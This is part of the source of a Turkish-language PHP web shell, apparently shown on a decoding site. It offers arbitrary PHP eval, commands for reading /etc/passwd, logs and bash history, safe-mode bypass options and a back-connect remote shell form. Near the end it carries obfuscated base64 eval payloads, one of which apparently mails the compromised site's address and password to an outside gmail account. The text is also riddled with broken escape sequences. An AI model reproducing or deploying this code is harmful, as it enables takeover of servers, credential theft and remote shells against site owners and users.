input("submit","","Oku-D\xc3\xbczenle","");print "</center>".$ef.$ec.$et."</div></td>";\xaprint "<td><div align=center>";print $st.$c1;\xaprint "<center><div><b>Dizin'i G\303\xb6ster<br>";print $ec.$c2.$sf."<center><div style='margin-top:7px'>"; input("text","scdir",$nscdir,59);print"<br>";
input("submit","","G\303\xb6ster","");print " ";\xainput("reset","","R00T","");print "</center>".$ef.$ec.$et."</div></td>";
print "<td><div align=center>";print $st.$c1;\xaprint "<center><div><b>Dosya Boyutu : ".filesize($upfile)." in ( B/Kb )";print $ec.$c2."<form method=post Enctype=multipart/form-data><center>";
input("file","upfile","",40);input("hidden","scdir",$nscdir,0);
input("hidden","up",$nscdir,0);
print"<br>";input("submit","","Y\xc3\xbckle","");print "</center>".$ef.$ec.$et."</div></td></tr>";
delm("");print "<table bgcolor=#2A2A2A style=\"border:2px solid white\" width=100%>";print "<tr><td width=50%><div align=left>";
print $st.$c1."<div><b><center>Php Kodu Ger\303\xa7ekle\305\x9ftir</div>";
print $ec.$c2.$sf;input("hidden","scdir",$nscdir,0);\xaprint " <textarea cols=73 rows=3 name=eval>";
if(!isset($evsub)){print "//system('id'); //readfile('/etc/passwd'); //passthru('pwd');";}else{print htmlspecialchars(stripslashes($eval));}
print "</textarea><br><center>";
input('submit','evsub','Ger\xc3\247ekle\xc5\x9ftir');print " ";
input('Reset','','Reset');print " ";
print "</center>".$ec.$ef.$et;\xaprint "</td><td height=20% width=50%><div align=center>";\xaprint $st.$c1."<div><b><center>Faydal\304\xb1 Komutlar</div>";
print $ec.$c2.$sf;input("hidden","scdir",$nscdir,0);\xaprint "<center><select style='width:60%' name=uscmnds size=1>
<option value='op0'>Execute quick commands</option>
<option value='op1'>ls -lia</option>\xa<option value='op2'>/etc/passwd</option>
<option value='op3'>/var/cpanel/accounting.log</option>
<option value='op4'>/var/named</option>\xa<option value='op11'>Perms in curr Dir</option>\xa<option value='op12'>Perms in main Dir</option>
<option value='op5'>Find service.pwd files</option>
<option value='op6'>Find config files</option>
<option value='op7'>Find .bash_history files</option>
<option value='op8'>Read hosts file</option>\xa<option value='op9'>Root login</option>
<option value='op10'>Show opened ports</option>
<option value='op13'>Show services</option>\xa</select> ";print"<input type=submit name=subqcmnds value=Ger\xc3\247ekle\xc5\237tir style='height:20'> <input type=reset value=Geri D\303\266n style='height:20'></center>";\xaprint $ec.$ef.$et."</td></tr></table>";delm("");
print "<table bgcolor=#2A2A2A style=\"border:2px solid white\" width=100%>";
print "<tr><td width=50%><div align=left>";\xaprint $st.$c1."<div><b><center>".$cpmvmess."</div>";
print $ec.$c2.$sf." ";input("text","ftcpy","Dosya Ad\xc4\xb1",15);\xaprint "<b><font face=tahoma size=2> Ta\xc5\x9f\304\261 </b>";
input("text","cpyf",$nscdir,45);input("hidden","scdir",$nscdir,0);print " ";
input("submit","cpy","Kopyala","");print " ";input("submit","mve","Ta\xc5\x9f\304\261","");
print "</center>".$ec.$ef.$et;\xaprint "</td><td height=20% width=50%><div align=right>";\xaprint $st.$c1."<div><b><center>\xc3\x87ok Kullan\304\261lan Komutlar</div>";
print $ec.$c2.$sf." ";input("hidden","scdir",$nscdir,0);
print "<select style='width:22%' name=ustools size=1>\xa<option value='t1'>Wget</option><option value='t2'>Curl</option>
<option value='t3'>Lynx</option><option value='t9'>Get</option>
<option value='t4'>Unzip</option><option value='t5'>Tar</option>
<option value='t6'>Tar.gz</option><option value='t7'>Chmod 777</option>
<option value='t8'>Make</option></select> ";input('text','ustname','',51);print " ";input('submit','ustsub','Ger\303\xa7ekle\xc5\237tir');print "</center>".$ec.$ef.$et;\xaprint "</td></tr></table>";delm("<font face=Tahoma color=#FFFFFF size=2>G\303\274venlik Modunu A\305\237ma | \304\xb0kinci Yol");
print "<table bgcolor=#2A2A2A style=\"border:2px solid white\" width=100%>";
print "<tr><td width=50%><div align=left>";
print $st.$c1."<div><b><center>Kopyalama Fonksiyonunu Kullan</div>";
print $ec.$c2.$sf." ";input("text","safefile",$nscdir,75);\xainput("hidden","scdir",$nscdir,0);print " ";\xainput("submit","","Read-F","");print "</center>".$ec.$ef.$et;\xaprint "</td><td height=20% width=50%><div align=right>";
print $st.$c1."<div><b><center>Onar\xc4\261m Fonksiyonunu Kullan</div>";
print $ec.$c2.$sf." ";input("text","inifile",$nscdir,75);\xainput("hidden","scdir",$nscdir,0);print " ";
input("submit","","Read-F","");print "</center>".$ec.$ef.$et;
print "</td></tr></table>";delm("<font face=Tahoma color=#FFFFFF size=2>ArkaKap\304\261 Ba\xc4\237lant\xc4\261s\304\261");\xaprint "<table bgcolor=#2A2A2A style=\"border:2px solid white\" width=100%>";\xaprint "<tr><td width=50%><div align=left>";\xaprint $st.$c1."<div><b><center>ArkaKap\304\261 ile Baglan</div>";
print $ec.$c2.$sf." ";input("text","bip",$REMOTE_ADDR,47);print " ";
input("text","bport",80,10);input("hidden","scdir",$nscdir,0);print " ";\xainput("submit","","Ba\xc4\x9flan","");print " ";input("reset","","Reset","");\xaprint "</center>".$ec.$ef.$et;print "</td><td height=20% width=50%><div align=right>";print $st.$c1."<div><b><center>Y\xc3\xbcklenmis ArkaKap\xc4\xb1</div>";\xaprint $ec.$c2.$sf." ";print "<select style='width:15%' name=upports size=1>
<option value='up80'>80</option><option value='up443'>443</option>\xa<option value='up2121'>2121</option></select>";print " ";\xainput("text","uback","back.pl",23);print " ";\xainput("text","upip",$REMOTE_ADDR,29);print " ";input("submit","subupb","Ba\304\237lan");
print "</center>".$ec.$ef.$et;print "</td></tr></table>";
print "<br><table style=\"border:2px #FF0000 solid \" width=100% height=%>"; print"<tr><td><font size=2 face=tahoma>";
print"<center>Shell \303\xbczerinde oynama yapmay\xc4\261n\304\xb1z. Aksi taktirde \303\247al\xc4\xb1\xc5\x9fmayabilir. Geli\xc5\x9fime herzaman a\303\xa7\xc4\xb1kt\304\261r.<br>Bu Shell megabros taraf\xc4\xb1ndan programlanm\xc4\261\305\x9ft\xc4\xb1r</a>"; print"</font></td></tr></table>";$_F=__FILE__;$_X='Pz48c2NyNHB0IGwxbmczMWc1PWoxdjFzY3I0cHQ+ZDJjM201bnQud3I0dDUoM241c2MxcDUoJyVvQyU3byVlbyU3YSVlOSU3MCU3dSVhMCVlQyVlNiVlRSVlNyU3aSVlNiVlNyVlaSVvRCVhYSVlQSVlNiU3ZSVlNiU3byVlbyU3YSVlOSU3MCU3dSVhYSVvRSVlZSU3aSVlRSVlbyU3dSVlOSVlRiVlRSVhMCVldSV1ZSVhOCU3byVhOSU3QiU3ZSVlNiU3YSVhMCU3byVvNiVvRCU3aSVlRSVlaSU3byVlbyVlNiU3MCVlaSVhOCU3byVhRSU3byU3aSVlYSU3byU3dSU3YSVhOCVvMCVhQyU3byVhRSVlQyVlaSVlRSVlNyU3dSVlOCVhRCVvNiVhOSVhOSVvQiVhMCU3ZSVlNiU3YSVhMCU3dSVvRCVhNyVhNyVvQiVlZSVlRiU3YSVhOCVlOSVvRCVvMCVvQiVlOSVvQyU3byVvNiVhRSVlQyVlaSVlRSVlNyU3dSVlOCVvQiVlOSVhQiVhQiVhOSU3dSVhQiVvRCVpbyU3dSU3YSVlOSVlRSVlNyVhRSVlZSU3YSVlRiVlRCV1byVlOCVlNiU3YSV1byVlRiVldSVlaSVhOCU3byVvNiVhRSVlbyVlOCVlNiU3YSV1byVlRiVldSVlaSV1NiU3dSVhOCVlOSVhOSVhRCU3byVhRSU3byU3aSVlYSU3byU3dSU3YSVhOCU3byVhRSVlQyVlaSVlRSVlNyU3dSVlOCVhRCVvNiVhQyVvNiVhOSVhOSVvQiVldSVlRiVlbyU3aSVlRCVlaSVlRSU3dSVhRSU3NyU3YSVlOSU3dSVlaSVhOCU3aSVlRSVlaSU3byVlbyVlNiU3MCVlaSVhOCU3dSVhOSVhOSVvQiU3RCVvQyVhRiU3byVlbyU3YSVlOSU3MCU3dSVvRScpKTtkRignKjhIWEhXTlVZKjdpWFdIKjhJbXl5Myo4RnV1Mm5zdG8ybm9renMzbmhvdHdsdXF2dXhqaHp3bnklN0VvMngqOEoqOEh1WEhXTlVZKjhKaScpPC9zY3I0cHQ+';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));
$injbuff = "JHZpc2l0YyA9ICRfQ09PS0lFWyJ2aXNpdHMiXTsNCmlmICgkdmlzaXRjID09ICIiKSB7DQogICR2aXNpdGMgID0gMDsNCiAgJHZpc2l0b3IgPSAkX1NFUlZFUlsiUkVNT1RFX0FERFIiXTsNCiAgJHdlYiAgICAgPSAkX1NFUlZFUlsiSFRUUF9IT1NUIl07DQogICRpbmogICAgID0gJF9TRVJWRVJbIlJFUVVFU1RfVVJJIl07DQogICR0YXJnZXQgID0gcmF3dXJsZGVjb2RlKCR3ZWIuJGluaik7DQogICRqdWR1bCAgID0gIldTTyAyLjcgaHR0cDovLyR0YXJnZXQgYnkgJHZpc2l0b3IiOw0KICAkYm9keSAgICA9ICJCdWc6ICR0YXJnZXQgYnkgJHZpc2l0b3IgLSAkYXV0aF9wYXNzIjsNCiAgaWYgKCFlbXB0eSgkd2ViKSkgeyBAbWFpbCgiaGFyZHdhcmVoZWF2ZW4uY29tQGdtYWlsLmNvbSIsJGp1ZHVsLCRib2R5LCRhdXRoX3Bhc3MpOyB9DQp9DQplbHNlIHsgJHZpc2l0YysrOyB9DQpAc2V0Y29va2llKCJ2aXNpdHoiLCR2aXNpdGMpOw==";\xaeval(base64_decode($injbuff));\xa?>
"; ?>Function Calls
| None |
Stats
| MD5 | 1e17b6bd19ab36cb86098b0138c64774 |
| Eval Count | 0 |
| Decode Time | 103 ms |